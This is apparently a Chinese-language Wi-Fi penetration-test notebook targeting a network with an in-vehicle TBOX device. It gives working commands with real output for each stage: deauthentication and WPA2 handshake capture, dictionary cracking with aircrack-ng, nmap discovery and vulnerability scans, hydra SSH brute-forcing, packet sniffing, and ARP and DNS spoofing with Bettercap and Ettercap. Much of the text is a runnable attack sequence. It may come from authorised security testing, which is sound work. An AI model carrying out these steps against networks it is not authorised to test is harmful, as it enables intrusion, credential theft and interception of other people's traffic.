WIFI PENTEST
Contents
WIFI PENTEST
1. 嗅探
扫描整个网络,寻找可疑项(该热点已关闭SSID广播):
发送解除认证包:
sudo aireplay-ng --deauth 10 -a 74:07:7E:ED:7B:8D wlan0 --ignore-negative-one得ESSID和已连接的客户端MAC值:
ESSID:HQL00000000
加密方法:WPA2
打开抓包,抓包文件记为handshake:
sudo airodump-ng -c 6 --bssid 74:07:7E:ED:7B:8D -w handshake wlan0发送解除认证包,使客户端断开连接,重新与AP握手:
sudo aireplay-ng --deauth 10 -a 74:07:7E:ED:7B:8D wlan0 --ignore-negative-one
此过程中握手包被抓取并记录。
2. 弱口令爆破
利用握手包,使用kali自带的字典进行爆破:
sudo aircrack-ng -w /usr/share/dict/wordlist-probable.txt -b 74:07:7E:ED:7B:8D -e HQL00000000 handshake-01.cap
3. 口令复杂度分析
使用库zxcvbn,
以口令HomeWifi@2025为例,输出为:
密码强度评分(0-4):4
破解时间估计:
online_throttling_100_per_hour: centuries
online_no_throttling_10_per_second: centuries
offline_slow_hashing_1e4_per_second: 1 year
offline_fast_hashing_1e10_per_second: 37 seconds
密码分析建议:
警告:
无4. 内网渗透
4.1 扫描在线主机
破解WIFI口令后登入该网络,确认此网段内在线的主机:
sudo nmap -sn 192.168.10.0/24
# 输出Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-09 14:37 CST
Nmap scan report for 192.168.10.1
Host is up (0.050s latency).MAC Address: 8A:AC:1D:09:AA:CF (Unknown)Nmap scan report for 192.168.10.147
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 12.24 seconds此时仅两台设备在线,一台为本机,可见AP IP为192.168.10.1。
4.2 获取在线设备信息
获取该主机信息:
sudo nmap -A 192.168.1.101
# 输出Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-09 14:43 CST
Nmap scan report for bogon (192.168.10.1)Host is up (0.37s latency).Not shown: 999 filtered tcp ports (no-response)PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.4 (protocol 2.0)| ssh-hostkey:
| 256 34:03:90:3a:42:00:9d:cb:fa:80:f8:96:85:e3:08:1d (ECDSA)|_ 256 ca:bf:15:8d:42:28:5d:10:8c:67:f2:89:c9:b8:65:62 (ED25519)MAC Address: 8A:AC:1D:09:AA:CF (Unknown)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|switch|storage-misc|media device|load balancer
Running (JUST GUESSING): Linux 3.X|4.X (97%), Netgear embedded (91%), QNAP embedded (91%), Zgemma embedded (89%), Kemp embedded (87%)OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:3.18.24 cpe:/o:linux:linux_kernel:4.14 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:4.9
Aggressive OS guesses: Linux 3.12 - 4.10 (97%), Linux 3.18 (93%), Linux 3.16 (91%), Linux 4.14 (91%), Netgear GS108Tv3, GS110Tv3, or GS308T switch (Linux 3.18.24) (91%), QNAP NAS device (Linux 4.14) (91%), Zgemma H9 TV receiver (Linux 4.4) (89%), Kemp LoadMaster Firmware 7.2 (Linux 4.9) (87%), Rebranded surveillance DVR (Hikvision, Q-SEE, EYEsurv, A1Webcams, Foscam) (87%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hop
TRACEROUTEHOP RTT ADDRESS
1 365.84 ms bogon (192.168.10.1)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.12 seconds可知TBOX的SSH服务未关闭。
4.3 捕获内网中未加密的数据包
sudo tcpdump -i wlan0使用wireshark分析
4.4 漏洞扫描
此处在线设备为TBOX
sudo nmap --script vuln 192.168.10.1
# 输出Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-09 14:56 CST
Nmap scan report for 192.168.10.1
Host is up (0.38s latency).Not shown: 999 filtered tcp ports (no-response)PORT STATE SERVICE
22/tcp open ssh
MAC Address: 8A:AC:1D:09:AA:CF (Unknown)Nmap done: 1 IP address (1 host up) scanned in 44.26 seconds
4.5 SSH爆破
─$ ssh user@192.168.10.1
#输出The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.ED25519 key fingerprint is SHA256:s9L3hh3ICgQoYvYvJWftPyYLdnH+dRTgALELHxrMkEM.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yes─$ ssh root@192.168.10.1#输出root@192.168.10.1's password:
─$ ssh guest@192.168.10.1
#输出guest@192.168.10.1's password:登录提示说明存在用户名为root,guest的用户有口令,而user用户使用的是非对称密钥:
针对root和guest:
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.10.1
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-09 15:27:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.10.1:22/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 14344301 to do in 2390:44h, 14 active
[STATUS] 109.67 tries/min, 329 tries in 00:03h, 14344072 to do in 2179:58h, 14 active└─$ hydra -l guest -P /usr/share/wordlists/rockyou.txt ssh://192.168.10.1都无法成功破解。
5. 中间人攻击
5.1 ARP欺骗
通过 ARP 欺骗,告诉目标设备和网关攻击者是合法通信对方。
5.1.1 使用 Bettercap
-
安装 Bettercap:
sudo apt update sudo apt install bettercap -
启动 Bettercap:
sudo bettercap -iface wlan0 -
执行 ARP 欺骗:
net.probe on # 探测内网设备set arp.spoof.targets 192.168.10.1 # 设置目标设备arp.spoof on # 开启 ARP 欺骗net.sniff on # 开启数据嗅探
5.1.2 使用 Ettercap
-
启动 Ettercap:
sudo ettercap -G -
选择网络接口(如 wlan0)。
-
扫描并选择目标:
- 扫描目标网段(
192.168.10.0/24),将目标设备和网关加入攻击列表。
- 扫描目标网段(
-
启动 ARP 欺骗:
-
Mitm > ARP Poisoning > Sniff Remote Connections
-
5.2 DNS欺骗
通过 DNS 欺骗将目标设备的请求重定向到攻击者指定的地址。
5.2.1 使用 Bettercap 的 DNS Spoof 模块
-
配置 DNS 欺骗:
set dns.spoof.domains example.com # 替换为你想拦截的域名set dns.spoof.address 192.168.10.1 # 替换为伪造的 IP 地址dns.spoof on -
生效后,目标访问
example.com 会被重定向到攻击者设备。